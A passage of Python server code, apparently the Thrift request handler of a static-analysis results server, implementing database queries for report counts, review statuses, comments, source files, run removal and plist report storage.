          counts will be calculated for all of the available runs.
        """
        self.__require_access()
        results = []

        with DBSession(self.__Session) as session:
            filter_expression = process_report_filter(session, report_filter)

            count_expr = create_count_expression(report_filter)
            q = session.query(Run.id,
                              Run.name,
                              count_expr) \
                .select_from(Report)

            if run_ids:
                q = q.filter(Report.run_id.in_(run_ids))

            q = q.outerjoin(File, Report.file_id == File.id) \
                .outerjoin(ReviewStatus,
                           ReviewStatus.bug_hash == Report.bug_id) \
                .outerjoin(Run,
                           Report.run_id == Run.id) \
                .filter(filter_expression) \
                .order_by(Run.name) \
                .group_by(Run.id)

            if limit:
                q = q.limit(limit).offset(offset)

            for run_id, run_name, count in q:
                report_count = RunReportCount(runId=run_id,
                                              name=run_name,
                                              reportCount=count)
                results.append(report_count)

            return results

    @exc_to_thrift_reqfail
    @timeit
    def getRunResultCount(self, run_ids, report_filter, cmp_data):
        """Count the reports matching the filter (distinct bug hashes when
        the filter requests unique results)."""
        self.__require_access()

        with DBSession(self.__Session) as session:
            diff_hashes = None
            if cmp_data:
                diff_hashes, run_ids = self._cmp_helper(session,
                                                        run_ids,
                                                        report_filter,
                                                        cmp_data)
                if not diff_hashes:
                    # There is no difference.
                    return 0

            filter_expression = process_report_filter(session, report_filter)

            q = session.query(Report.bug_id)
            q = filter_report_filter(q,
                                     filter_expression,
                                     run_ids,
                                     cmp_data,
                                     diff_hashes)

            if report_filter is not None and report_filter.isUnique:
                q = q.group_by(Report.bug_id)

            report_count = q.count()
            if report_count is None:
                report_count = 0

            return report_count

    @staticmethod
    @timeit
    def __construct_bug_item_list(session, report_id, item_type):
        # Collect the ordered bug-path items (events or points) of a report
        # together with the path of the file each item refers to.

        q = session.query(item_type) \
            .filter(item_type.report_id == report_id) \
            .order_by(item_type.order)

        bug_items = []

        for event in q:
            f = session.query(File).get(event.file_id)
            bug_items.append((event, f.filepath))

        return bug_items

    @exc_to_thrift_reqfail
    @timeit
    def getReportDetails(self, reportId):
        """
        Parameters:
         - reportId

        Return the bug path events and bug report points of a report.
        """
        self.__require_access()
        with DBSession(self.__Session) as session:
            report = session.query(Report).get(reportId)

            events = ThriftRequestHandler.__construct_bug_item_list(
                session, report.id, BugPathEvent)
            bug_events_list = []
            for event, file_path in events:
                event = bugpathevent_db_to_api(event)
                event.filePath = file_path
                bug_events_list.append(event)

            points = ThriftRequestHandler.__construct_bug_item_list(
                session, report.id, BugReportPoint)
            bug_point_list = []
            for bug_point, file_path in points:
                bug_point = bugreportpoint_db_to_api(bug_point)
                bug_point.filePath = file_path
                bug_point_list.append(bug_point)

            return ReportDetails(bug_events_list, bug_point_list)

    def _setReviewStatus(self, report_id, status, message, session):
        """
        This function sets the review status of the given report. This is the
        implementation of changeReviewStatus(), but it is also extended with
        a session parameter which represents a database transaction. This is
        needed because during storage a specific session object has to be
        used.
        """
        self.__require_permission([permissions.PRODUCT_ACCESS,
                                   permissions.PRODUCT_STORE])

        report = session.query(Report).get(report_id)
        if report:
            # Review status is keyed by bug hash, so it is shared between
            # all reports with the same hash.
            review_status = session.query(ReviewStatus).get(report.bug_id)
            if review_status is None:
                review_status = ReviewStatus()
                review_status.bug_hash = report.bug_id

            user = self.__auth_session.user \
                if self.__auth_session else "Anonymous"

            review_status.status = review_status_str(status)
            review_status.author = user
            review_status.message = message
            review_status.date = datetime.now()

            session.add(review_status)
            # Flush only; committing is the caller's responsibility.
            session.flush()

            return True
        else:
            msg = "No report found in the database."
            raise shared.ttypes.RequestFailed(
                shared.ttypes.ErrorCode.DATABASE, msg)

    @exc_to_thrift_reqfail
    @timeit
    def changeReviewStatus(self, report_id, status, message):
        """
        Change review status of the bug by report id.
        """
        with DBSession(self.__Session) as session:
            res = self._setReviewStatus(report_id, status, message, session)
            session.commit()

        return res

    @exc_to_thrift_reqfail
    @timeit
    def getComments(self, report_id):
        """
        Return the list of comments for the given bug.
        """
        self.__require_access()

        with DBSession(self.__Session) as session:
            report = session.query(Report).get(report_id)
            if report:
                result = []

                # Comments are keyed by bug hash, newest first.
                comments = session.query(Comment) \
                    .filter(Comment.bug_hash == report.bug_id) \
                    .order_by(Comment.created_at.desc()) \
                    .all()

                for comment in comments:
                    result.append(CommentData(
                        comment.id,
                        comment.author,
                        comment.message,
                        str(comment.created_at)))

                return result
            else:
                msg = 'Report id ' + str(report_id) + \
                      ' was not found in the database.'
                raise shared.ttypes.RequestFailed(
                    shared.ttypes.ErrorCode.DATABASE, msg)

    @exc_to_thrift_reqfail
    @timeit
    def getCommentCount(self, report_id):
        """
        Return the number of comments for the given bug.
        """
        self.__require_access()
        with DBSession(self.__Session) as session:
            report = session.query(Report).get(report_id)
            if report:
                commentCount = session.query(Comment) \
                    .filter(Comment.bug_hash == report.bug_id) \
                    .count()

            # NOTE(review): if `report` is None, `commentCount` is never
            # assigned and the lines below raise NameError — verify whether
            # a missing report should raise RequestFailed like getComments.
            if commentCount is None:
                commentCount = 0

            return commentCount

    @exc_to_thrift_reqfail
    @timeit
    def addComment(self, report_id, comment_data):
        """
        Add new comment for the given bug.
        """
        self.__require_access()
        with DBSession(self.__Session) as session:
            report = session.query(Report).get(report_id)
            if report:
                user = self.__auth_session.user\
                    if self.__auth_session else "Anonymous"
                comment = Comment(report.bug_id,
                                  user,
                                  comment_data.message,
                                  datetime.now())

                session.add(comment)
                session.commit()

                return True
            else:
                msg = 'Report id ' + str(report_id) + \
                      ' was not found in the database.'
                LOG.error(msg)
                raise shared.ttypes.RequestFailed(
                    shared.ttypes.ErrorCode.DATABASE, msg)

    @exc_to_thrift_reqfail
    @timeit
    def updateComment(self, comment_id, content):
        """
        Update the given comment message with new content. We allow
        comments to be updated by it's original author only, except for
        Anyonymous comments that can be updated by anybody.
        """
        self.__require_access()
        with DBSession(self.__Session) as session:

            user = self.__auth_session.user \
                if self.__auth_session else "Anonymous"

            comment = session.query(Comment).get(comment_id)
            if comment:
                if comment.author != 'Anonymous' and comment.author != user:
                    raise shared.ttypes.RequestFailed(
                        shared.ttypes.ErrorCode.UNAUTHORIZED,
                        'Unathorized comment modification!')
                comment.message = content
                session.add(comment)
                session.commit()

                return True
            else:
                msg = 'Comment id ' + str(comment_id) + \
                      ' was not found in the database.'
                LOG.error(msg)
                raise shared.ttypes.RequestFailed(
                    shared.ttypes.ErrorCode.DATABASE, msg)

    @exc_to_thrift_reqfail
    @timeit
    def removeComment(self, comment_id):
        """
        Remove the comment. We allow comments to be removed by it's
        original author only, except for Anyonymous comments that can be
        updated by anybody.
        """
        self.__require_access()

        user = self.__auth_session.user \
            if self.__auth_session else "Anonymous"

        with DBSession(self.__Session) as session:

            comment = session.query(Comment).get(comment_id)
            if comment:
                # Only the author may remove a comment, unless it is
                # anonymous.
                if comment.author != 'Anonymous' and comment.author != user:
                    raise shared.ttypes.RequestFailed(
                        shared.ttypes.ErrorCode.UNAUTHORIZED,
                        'Unathorized comment modification!')

                session.delete(comment)
                session.commit()

                return True
            else:
                msg = 'Comment id ' + str(comment_id) + \
                      ' was not found in the database.'
                raise shared.ttypes.RequestFailed(
                    shared.ttypes.ErrorCode.DATABASE, msg)

    @exc_to_thrift_reqfail
    @timeit
    def getCheckerDoc(self, checkerId):
        """
        Parameters:
         - checkerId

        Return the markdown documentation of the checker, or a fallback
        message pointing at the ClangSA / ClangTidy checker list.
        """

        missing_doc = "No documentation found for checker: " + checkerId + \
                      "\n\nPlease refer to the documentation at the "
        sa_link = "http://clang-analyzer.llvm.org/available_checks.html"
        tidy_link = "http://clang.llvm.org/extra/clang-tidy/checks/list.html"

        # Heuristic: ClangSA checker names contain '.', ClangTidy ones '-'.
        if "." in checkerId:
            missing_doc += "[ClangSA](" + sa_link + ")"
        elif "-" in checkerId:
            missing_doc += "[ClangTidy](" + tidy_link + ")"
        missing_doc += " homepage."

        try:
            md_file = self.__checker_doc_map.get(checkerId)
            if md_file:
                md_file = os.path.join(self.__checker_md_docs, md_file)
                try:
                    with io.open(md_file, 'r') as md_content:
                        missing_doc = md_content.read()
                except (IOError, OSError) as oerr:
                    # NOTE(review): `oerr` is unused; only the path is logged
                    # and the fallback message is returned.
                    LOG.warning("Failed to read checker documentation: %s",
                                md_file)

            return missing_doc
        except Exception as ex:
            msg = str(ex)
            raise shared.ttypes.RequestFailed(shared.ttypes.ErrorCode.IOERROR,
                                              msg)

    @exc_to_thrift_reqfail
    @timeit
    def getSourceFileData(self, fileId, fileContent, encoding):
        """
        Parameters:
         - fileId
         - fileContent
         - enum Encoding
        """
        self.__require_access()
        with DBSession(self.__Session) as session:
            sourcefile = session.query(File).get(fileId)
            if sourcefile is None:
                return SourceFileData()

            if fileContent:
                # File contents are stored zlib-compressed, keyed by hash.
                cont = session.query(FileContent).get(sourcefile.content_hash)
                source = zlib.decompress(cont.content)

                if not encoding or encoding == Encoding.DEFAULT:
                    source = codecs.decode(source, 'utf-8', 'replace')
                elif encoding == Encoding.BASE64:
                    source = base64.b64encode(source)

                return SourceFileData(fileId=sourcefile.id,
                                      filePath=sourcefile.filepath,
                                      fileContent=source)
            else:
                return SourceFileData(fileId=sourcefile.id,
                                      filePath=sourcefile.filepath)

    @exc_to_thrift_reqfail
    @timeit
    def getLinesInSourceFileContents(self, lines_in_files_requested, encoding):
        """Return the requested source lines per file id, encoded as asked.

        Result shape: {fileId: {lineNumber: lineContent}}.
        """
        self.__require_access()
        with DBSession(self.__Session) as session:

            res = defaultdict(lambda: defaultdict(str))
            for lines_in_file in lines_in_files_requested:
                sourcefile = session.query(File).get(lines_in_file.fileId)
                cont = session.query(FileContent).get(sourcefile.content_hash)
                lines = zlib.decompress(cont.content).split('\n')
                for line in lines_in_file.lines:
                    # Out-of-range line numbers yield an empty string.
                    content = '' if len(lines) < line else lines[line - 1]
                    if not encoding or encoding == Encoding.DEFAULT:
                        content = codecs.decode(content, 'utf-8', 'replace')
                    elif encoding == Encoding.BASE64:
                        content = base64.b64encode(content)
                    res[lines_in_file.fileId][line] = content

            return res

    def _cmp_helper(self, session, run_ids,
                    report_filter, cmp_data):
        """
        Get the report hashes for all of the runs.
        Return the hash list which should be queried
        in the returned run id list.
        """
        if not run_ids:
            run_ids = ThriftRequestHandler.__get_run_ids_to_query(session,
                                                                  cmp_data)

        base_run_ids = run_ids
        new_run_ids = cmp_data.runIds
        diff_type = cmp_data.diffType

        tag_ids = report_filter.runTag if report_filter else None
        base_line_hashes = get_report_hashes(session,
                                             base_run_ids,
                                             tag_ids)

        # If run tag is set in compare data, after base line hashes are
        # calculated remove it from the report filter because we will filter
        # results by these hashes and there is no need to filter results by
        # these tags again.
        if cmp_data.runTag:
            report_filter.runTag = None

        if not new_run_ids and not cmp_data.runTag:
            return base_line_hashes, base_run_ids

        new_check_hashes = get_report_hashes(session,
                                             new_run_ids,
                                             cmp_data.runTag)

        report_hashes, run_ids = \
            get_diff_hashes_for_query(base_run_ids,
                                      base_line_hashes,
                                      new_run_ids,
                                      new_check_hashes,
                                      diff_type)
        return report_hashes, run_ids

    @exc_to_thrift_reqfail
    @timeit
    def getCheckerCounts(self, run_ids, report_filter, cmp_data, limit,
                         offset):
        """
          If the run id list is empty the metrics will be counted
          for all of the runs and in compare mode all of the runs
          will be used as a baseline excluding the runs in compare data.
        """
        self.__require_access()
        results = []
        with DBSession(self.__Session) as session:
            diff_hashes = None
            if cmp_data:
                diff_hashes, run_ids = self._cmp_helper(session,
                                                        run_ids,
                                                        report_filter,
                                                        cmp_data)
                if not diff_hashes:
                    # There is no difference.
                    return results

            filter_expression = process_report_filter(session, report_filter)

            is_unique = report_filter is not None and report_filter.isUnique
            if is_unique:
                # Unique mode: aggregate per bug hash first, then count
                # hashes per checker below.
                q = session.query(func.max(Report.checker_id).label(
                                      'checker_id'),
                                  func.max(Report.severity).label(
                                      'severity'),
                                  Report.bug_id)
            else:
                q = session.query(Report.checker_id,
                                  Report.severity,
                                  func.count(Report.id))

            q = filter_report_filter(q,
                                     filter_expression,
                                     run_ids,
                                     cmp_data,
                                     diff_hashes)

            unique_checker_q = None
            if is_unique:
                q = q.group_by(Report.bug_id).subquery()
                unique_checker_q = session.query(q.c.checker_id,
                                                 func.max(q.c.severity),
                                                 func.count(q.c.bug_id)) \
                    .group_by(q.c.checker_id) \
                    .order_by(q.c.checker_id)
            else:
                unique_checker_q = q.group_by(Report.checker_id,
                                              Report.severity) \
                    .order_by(Report.checker_id)

            if limit:
                unique_checker_q = unique_checker_q.limit(limit).offset(offset)

            for name, severity, count in unique_checker_q:
                checker_count = CheckerCount(name=name,
                                             severity=severity,
                                             count=count)
                results.append(checker_count)

            return results

    @exc_to_thrift_reqfail
    @timeit
    def getSeverityCounts(self, run_ids, report_filter, cmp_data):
        """
          If the run id list is empty the metrics will be counted
          for all of the runs and in compare mode all of the runs
          will be used as a baseline excluding the runs in compare data.
        """
        self.__require_access()
        results = {}
        with DBSession(self.__Session) as session:
            diff_hashes = None
            if cmp_data:
                diff_hashes, run_ids = self._cmp_helper(session,
                                                        run_ids,
                                                        report_filter,
                                                        cmp_data)
                if not diff_hashes:
                    # There is no difference.
                    return results

            filter_expression = process_report_filter(session, report_filter)

            is_unique = report_filter is not None and report_filter.isUnique
            if is_unique:
                # Unique mode: one row per bug hash, then count hashes per
                # severity below.
                q = session.query(func.max(Report.severity).label('severity'),
                                  Report.bug_id)
            else:
                q = session.query(Report.severity,
                                  func.count(Report.id))

            q = filter_report_filter(q,
                                     filter_expression,
                                     run_ids,
                                     cmp_data,
                                     diff_hashes)

            severities = None
            if is_unique:
                q = q.group_by(Report.bug_id).subquery()
                severities = session.query(q.c.severity,
                                           func.count(q.c.bug_id)) \
                    .group_by(q.c.severity)
            else:
                severities = q.group_by(Report.severity)

            # {severity: count}
            results = dict(severities)

        return results

    @exc_to_thrift_reqfail
    @timeit
    def getCheckerMsgCounts(self, run_ids, report_filter, cmp_data, limit,
                            offset):
        """
          If the run id list is empty the metrics will be counted
          for all of the runs and in compare mode all of the runs
          will be used as a baseline excluding the runs in compare data.
        """
        self.__require_access()
        results = {}
        with DBSession(self.__Session) as session:
            diff_hashes = None
            if cmp_data:
                diff_hashes, run_ids = self._cmp_helper(session,
                                                        run_ids,
                                                        report_filter,
                                                        cmp_data)
                if not diff_hashes:
                    # There is no difference.
                    return results

            filter_expression = process_report_filter(session, report_filter)

            is_unique = report_filter is not None and report_filter.isUnique
            if is_unique:
                q = session.query(func.max(Report.checker_message).label(
                                      'checker_message'),
                                  Report.bug_id)
            else:
                q = session.query(Report.checker_message,
                                  func.count(Report.id))

            q = filter_report_filter(q,
                                     filter_expression,
                                     run_ids,
                                     cmp_data,
                                     diff_hashes)

            checker_messages = None
            if is_unique:
                q = q.group_by(Report.bug_id).subquery()
                checker_messages = session.query(q.c.checker_message,
                                                 func.count(q.c.bug_id)) \
                    .group_by(q.c.checker_message) \
                    .order_by(q.c.checker_message)
            else:
                checker_messages = q.group_by(Report.checker_message) \
                    .order_by(Report.checker_message)

            if limit:
                checker_messages = checker_messages.limit(limit).offset(offset)

            # {checker_message: count}
            results = dict(checker_messages.all())
            return results

    @exc_to_thrift_reqfail
    @timeit
    def getReviewStatusCounts(self, run_ids, report_filter, cmp_data):
        """
          If the run id list is empty the metrics will be counted
          for all of the runs and in compare mode all of the runs
          will be used as a baseline excluding the runs in compare data.
        """
        self.__require_access()
        results = defaultdict(int)
        with DBSession(self.__Session) as session:
            diff_hashes = None
            if cmp_data:
                diff_hashes, run_ids = self._cmp_helper(session,
                                                        run_ids,
                                                        report_filter,
                                                        cmp_data)
                if not diff_hashes:
                    # There is no difference.
                    return results

            filter_expression = process_report_filter(session, report_filter)

            is_unique = report_filter is not None and report_filter.isUnique
            if is_unique:
                q = session.query(Report.bug_id,
                                  func.max(ReviewStatus.status).label(
                                      'status'))
            else:
                q = session.query(func.max(Report.bug_id),
                                  ReviewStatus.status,
                                  func.count(Report.id))

            q = filter_report_filter(q,
                                     filter_expression,
                                     run_ids,
                                     cmp_data,
                                     diff_hashes)

            review_statuses = None
            if is_unique:
                q = q.group_by(Report.bug_id).subquery()
                review_statuses = session.query(func.max(q.c.bug_id),
                                                q.c.status,
                                                func.count(q.c.bug_id)) \
                    .group_by(q.c.status)
            else:
                review_statuses = q.group_by(ReviewStatus.status)

            for _, rev_status, count in review_statuses:
                if rev_status is None:
                    # If no review status is set count it as unreviewed.
                    rev_status = ttypes.ReviewStatus.UNREVIEWED
                    results[rev_status] += count
                else:
                    rev_status = review_status_enum(rev_status)
                    results[rev_status] += count

        return results

    @exc_to_thrift_reqfail
    @timeit
    def getFileCounts(self, run_ids, report_filter, cmp_data, limit, offset):
        """
          If the run id list is empty the metrics will be counted
          for all of the runs and in compare mode all of the runs
          will be used as a baseline excluding the runs in compare data.
        """
        self.__require_access()
        results = {}
        with DBSession(self.__Session) as session:
            if cmp_data:
                diff_hashes, run_ids = self._cmp_helper(session,
                                                        run_ids,
                                                        report_filter,
                                                        cmp_data)
                if not diff_hashes:
                    # There is no difference.
                    return results

            filter_expression = process_report_filter(session, report_filter)

            stmt = session.query(Report.bug_id,
                                 Report.file_id) \
                .outerjoin(ReviewStatus,
                           ReviewStatus.bug_hash == Report.bug_id) \
                .outerjoin(File,
                           File.id == Report.file_id) \
                .filter(filter_expression)

            if run_ids:
                stmt = stmt.filter(Report.run_id.in_(run_ids))

            if report_filter is not None and report_filter.isUnique:
                # Count each (hash, file) pair once in unique mode.
                stmt = stmt.group_by(Report.bug_id, Report.file_id)

            stmt = stmt.subquery()

            report_count = session.query(stmt.c.file_id,
                                         func.count(1).label(
                                             'report_count')) \
                .group_by(stmt.c.file_id)

            if limit:
                report_count = report_count.limit(limit).offset(offset)

            report_count = report_count.subquery()
            file_paths = session.query(File.filepath,
                                       report_count.c.report_count) \
                .join(report_count,
                      report_count.c.file_id == File.id)

            for fp, count in file_paths:
                results[fp] = count

        return results

    @exc_to_thrift_reqfail
    @timeit
    def getRunHistoryTagCounts(self, run_ids, report_filter, cmp_data):
        """
          If the run id list is empty the metrics will be counted
          for all of the runs and in compare mode all of the runs
          will be used as a baseline excluding the runs in compare data.
        """
        self.__require_access()
        results = []
        with DBSession(self.__Session) as session:
            if cmp_data:
                diff_hashes, run_ids = self._cmp_helper(session,
                                                        run_ids,
                                                        report_filter,
                                                        cmp_data)
                if not diff_hashes:
                    # There is no difference.
return results filter_expression = process_report_filter(session, report_filter) tag_run_ids = session.query(RunHistory.run_id.distinct()) \ .filter(RunHistory.version_tag.isnot(None)) \ .subquery() report_cnt_q = session.query(Report.run_id, Report.bug_id, Report.detected_at, Report.fixed_at) \ .outerjoin(File, Report.file_id == File.id) \ .outerjoin(ReviewStatus, ReviewStatus.bug_hash == Report.bug_id) \ .filter(filter_expression) \ .filter(Report.run_id.in_(tag_run_ids)) \ .subquery() is_unique = report_filter is not None and report_filter.isUnique count_expr = func.count(report_cnt_q.c.bug_id if not is_unique else report_cnt_q.c.bug_id.distinct()) count_q = session.query(RunHistory.id.label('run_history_id'), count_expr.label('report_count')) \ .outerjoin(report_cnt_q, report_cnt_q.c.run_id == RunHistory.run_id) \ .filter(RunHistory.version_tag.isnot(None)) \ .filter(and_(report_cnt_q.c.detected_at <= RunHistory.time, or_(report_cnt_q.c.fixed_at.is_(None), report_cnt_q.c.fixed_at >= RunHistory.time))) \ .group_by(RunHistory.id) \ .subquery() tag_q = session.query(RunHistory.run_id.label('run_id'), RunHistory.id.label('run_history_id')) \ .filter(RunHistory.version_tag.isnot(None)) if run_ids: tag_q = tag_q.filter(RunHistory.run_id.in_(run_ids)) tag_q = tag_q.subquery() q = session.query(tag_q.c.run_history_id, func.max(Run.name).label('run_name'), func.max(RunHistory.id), func.max(RunHistory.time), func.max(RunHistory.version_tag), func.max(count_q.c.report_count)) \ .outerjoin(RunHistory, RunHistory.id == tag_q.c.run_history_id) \ .outerjoin(Run, Run.id == tag_q.c.run_id) \ .outerjoin(count_q, count_q.c.run_history_id == RunHistory.id) \ .filter(RunHistory.version_tag.isnot(None)) \ .group_by(tag_q.c.run_history_id) \ .order_by('run_name') for _, run_name, tag_id, version_time, tag, count in q: if tag: results.append(RunTagCount(id=tag_id, time=str(version_time), name=tag, runName=run_name, count=count if count else 0)) return results @exc_to_thrift_reqfail 
@timeit def getDetectionStatusCounts(self, run_ids, report_filter, cmp_data): """ If the run id list is empty the metrics will be counted for all of the runs and in compare mode all of the runs will be used as a baseline excluding the runs in compare data. """ self.__require_access() results = {} with DBSession(self.__Session) as session: diff_hashes = None if cmp_data: diff_hashes, run_ids = self._cmp_helper(session, run_ids, report_filter, cmp_data) if not diff_hashes: # There is no difference. return results filter_expression = process_report_filter(session, report_filter) count_expr = func.count(literal_column('*')) q = session.query(Report.detection_status, count_expr) q = filter_report_filter(q, filter_expression, run_ids, cmp_data, diff_hashes) detection_stats = q.group_by(Report.detection_status).all() results = dict(detection_stats) results = {detection_status_enum(k): v for k, v in results.items()} return results # ----------------------------------------------------------------------- @timeit def getPackageVersion(self): return self.__package_version # ----------------------------------------------------------------------- @exc_to_thrift_reqfail @timeit def removeRunResults(self, run_ids): self.__require_store() failed = False for run_id in run_ids: try: self.removeRun(run_id) except Exception as ex: LOG.error("Failed to remove run: " + str(run_id)) LOG.error(ex) failed = True return not failed def __removeReports(self, session, report_ids, chunk_size=500): """ Removing reports in chunks. 
""" for r_ids in [report_ids[i:i + chunk_size] for i in range(0, len(report_ids), chunk_size)]: session.query(Report) \ .filter(Report.id.in_(r_ids)) \ .delete(synchronize_session=False) @exc_to_thrift_reqfail @timeit def removeRunReports(self, run_ids, report_filter, cmp_data): self.__require_store() if not run_ids: run_ids = [] if cmp_data and cmp_data.runIds: run_ids.extend(cmp_data.runIds) with DBSession(self.__Session) as session: check_remove_runs_lock(session, run_ids) try: diff_hashes = None if cmp_data: diff_hashes, _ = self._cmp_helper(session, run_ids, report_filter, cmp_data) if not diff_hashes: # There is no difference. return True filter_expression = process_report_filter(session, report_filter) q = session.query(Report.id) \ .outerjoin(File, Report.file_id == File.id) \ .outerjoin(ReviewStatus, ReviewStatus.bug_hash == Report.bug_id) \ .filter(filter_expression) if run_ids: q = q.filter(Report.run_id.in_(run_ids)) if cmp_data: q = q.filter(Report.bug_id.in_(diff_hashes)) reports_to_delete = [r[0] for r in q] if len(reports_to_delete) != 0: self.__removeReports(session, reports_to_delete) # Delete files and contents that are not present # in any bug paths. db_cleanup.remove_unused_files(session) session.commit() session.close() return True except Exception as ex: session.rollback() LOG.error("Database cleanup failed.") LOG.error(ex) return False @exc_to_thrift_reqfail @timeit def removeRun(self, run_id): self.__require_store() # Remove the whole run. with DBSession(self.__Session) as session: check_remove_runs_lock(session, [run_id]) session.query(Run) \ .filter(Run.id == run_id) \ .delete(synchronize_session=False) session.commit() session.close() return True @exc_to_thrift_reqfail def getSuppressFile(self): """ Return the suppress file path or empty string if not set. 
""" self.__require_access() suppress_file = self.__src_comment_handler.suppress_file if suppress_file: return suppress_file return '' @exc_to_thrift_reqfail @timeit def addSourceComponent(self, name, value, description): """ Adds a new source if it does not exist or updates an old one. """ self.__require_admin() with DBSession(self.__Session) as session: component = session.query(SourceComponent).get(name) user = self.__auth_session.user if self.__auth_session else None if component: component.value = value component.description = description component.user = user else: component = SourceComponent(name, value, description, user) session.add(component) session.commit() return True @exc_to_thrift_reqfail @timeit def getSourceComponents(self, component_filter): """ Returns the available source components. """ self.__require_access() with DBSession(self.__Session) as session: q = session.query(SourceComponent) if component_filter and len(component_filter): sql_component_filter = [SourceComponent.name.ilike(conv(cf)) for cf in component_filter] q = q.filter(*sql_component_filter) q = q.order_by(SourceComponent.name) return list(map(lambda c: SourceComponentData(c.name, c.value, c.description), q)) @exc_to_thrift_reqfail @timeit def removeSourceComponent(self, name): """ Removes a source component. """ self.__require_admin() with DBSession(self.__Session) as session: component = session.query(SourceComponent).get(name) if component: session.delete(component) session.commit() return True else: msg = 'Source component ' + str(name) + \ ' was not found in the database.' 
raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, msg) @exc_to_thrift_reqfail @timeit def getMissingContentHashes(self, file_hashes): self.__require_store() with DBSession(self.__Session) as session: q = session.query(FileContent) \ .options(sqlalchemy.orm.load_only('content_hash')) \ .filter(FileContent.content_hash.in_(file_hashes)) return list(set(file_hashes) - set(map(lambda fc: fc.content_hash, q))) def __store_source_files(self, source_root, filename_to_hash, trim_path_prefixes): """ Storing file contents from plist. """ file_path_to_id = {} for file_name, file_hash in filename_to_hash.items(): source_file_name = os.path.join(source_root, file_name.strip("/")) source_file_name = os.path.realpath(source_file_name) LOG.debug("Storing source file: " + source_file_name) trimmed_file_path = util.trim_path_prefixes(file_name, trim_path_prefixes) if not os.path.isfile(source_file_name): # The file was not in the ZIP file, because we already # have the content. Let's check if we already have a file # record in the database or we need to add one. LOG.debug(file_name + ' not found or already stored.') fid = None with DBSession(self.__Session) as session: fid = store_handler.addFileRecord(session, trimmed_file_path, file_hash) if not fid: LOG.error("File ID for " + source_file_name + " is not found in the DB with " + "content hash " + file_hash + ". 
Missing from ZIP?") file_path_to_id[file_name] = fid LOG.debug(str(fid) + " fileid found") continue with codecs.open(source_file_name, 'r', 'UTF-8', 'replace') as source_file: file_content = source_file.read() file_content = codecs.encode(file_content, 'utf-8') with DBSession(self.__Session) as session: file_path_to_id[file_name] = \ store_handler.addFileContent(session, trimmed_file_path, file_content, file_hash, None) return file_path_to_id def __store_reports(self, session, report_dir, source_root, run_id, file_path_to_id, run_history_time, severity_map, wrong_src_code_comments, skip_handler): """ Parse up and store the plist report files. """ all_reports = session.query(Report) \ .filter(Report.run_id == run_id) \ .all() hash_map_reports = defaultdict(list) for report in all_reports: hash_map_reports[report.bug_id].append(report) already_added = set() new_bug_hashes = set() # Processing PList files. _, _, report_files = next(os.walk(report_dir), ([], [], [])) for f in report_files: if not f.endswith('.plist'): continue LOG.debug("Parsing input file '" + f + "'") try: files, reports = plist_parser.parse_plist( os.path.join(report_dir, f), source_root) except Exception as ex: LOG.error('Parsing the plist failed: ' + str(ex)) continue file_ids = {} for file_name in files: file_ids[file_name] = file_path_to_id[file_name] # Store report. for report in reports: source_file = files[report.main['location']['file']] if skip_handler.should_skip(source_file): continue bug_paths, bug_events = \ store_handler.collect_paths_events(report, file_ids, files) report_path_hash = get_report_path_hash(report, files) if report_path_hash in already_added: LOG.debug('Not storing report. 
Already added') LOG.debug(report) continue LOG.debug("Storing check results to the database.") LOG.debug("Storing report") bug_id = report.main[ 'issue_hash_content_of_line_in_context'] if bug_id in hash_map_reports: old_report = hash_map_reports[bug_id][0] old_status = old_report.detection_status detection_status = 'reopened' \ if old_status == 'resolved' else 'unresolved' else: detection_status = 'new' report_id = store_handler.addReport( session, run_id, file_ids[source_file], report.main, bug_paths, bug_events, detection_status, run_history_time if detection_status == 'new' else old_report.detected_at, severity_map) new_bug_hashes.add(bug_id) already_added.add(report_path_hash) last_report_event = report.bug_path[-1] file_name = files[last_report_event['location']['file']] source_file_name = os.path.realpath( os.path.join(source_root, file_name.strip("/"))) if os.path.isfile(source_file_name): sc_handler = SourceCodeCommentHandler(source_file_name) checker_name = report.main['check_name'] report_line = last_report_event['location']['line'] source_file = os.path.basename(file_name) src_comment_data = sc_handler.filter_source_line_comments( report_line, checker_name) if len(src_comment_data) == 1: status = src_comment_data[0]['status'] rw_status = ttypes.ReviewStatus.FALSE_POSITIVE if status == 'confirmed': rw_status = ttypes.ReviewStatus.CONFIRMED elif status == 'intentional': rw_status = ttypes.ReviewStatus.INTENTIONAL self._setReviewStatus(report_id, rw_status, src_comment_data[0]['message'], session) elif len(src_comment_data) > 1: LOG.warning( "Multiple source code comment can be found " "for '{0}' checker in '{1}' at line {2}. 
" "This bug will not be suppressed!".format( checker_name, source_file, report_line)) wrong_src_code = "{0}|{1}|{2}".format(source_file, report_line, checker_name) wrong_src_code_comments.append(wrong_src_code) LOG.debug("Storing done for report " + str(report_id)) reports_to_delete = set() for bug_hash, reports in hash_map_reports.items(): if bug_hash in new_bug_hashes: reports_to_delete.update(map(lambda x: x.id, reports)) else: for report in reports: # We set the fix date of a report only if the report # has not been fixed before. if report.fixed_at: continue report.detection_status = 'resolved' report.fixed_at = run_history_time if len(reports_to_delete) != 0: self.__removeReports(session, list(reports_to_delete)) @staticmethod @exc_to_thrift_reqfail def __store_run_lock(session, name, username): """ Store a RunLock record for the given run name into the database. """ # If the run can be stored, we need to lock it first. run_lock = session.query(RunLock) \ .filter(RunLock.name == name) \ .with_for_update(nowait=True).one_or_none() if not run_lock: # If there is no lock record for the given run name, the run # is not locked -- create a new lock. run_lock = RunLock(name, username) session.add(run_lock) elif run_lock.has_expired( db_cleanup.RUN_LOCK_TIMEOUT_IN_DATABASE): # There can be a lock in the database, which has already # expired. In this case, we assume that the previous operation # has failed, and thus, we can re-use the already present lock. run_lock.touch() run_lock.username = username else: # In case the lock exists and it has not expired, we must # consider the run a locked one. when = run_lock.when_expires( db_cleanup.RUN_LOCK_TIMEOUT_IN_DATABASE) username = run_lock.username if run_lock.username is not None \ else "another user" LOG.info("Refusing to store into run '{0}' as it is locked by " "{1}. Lock will expire at '{2}'." 
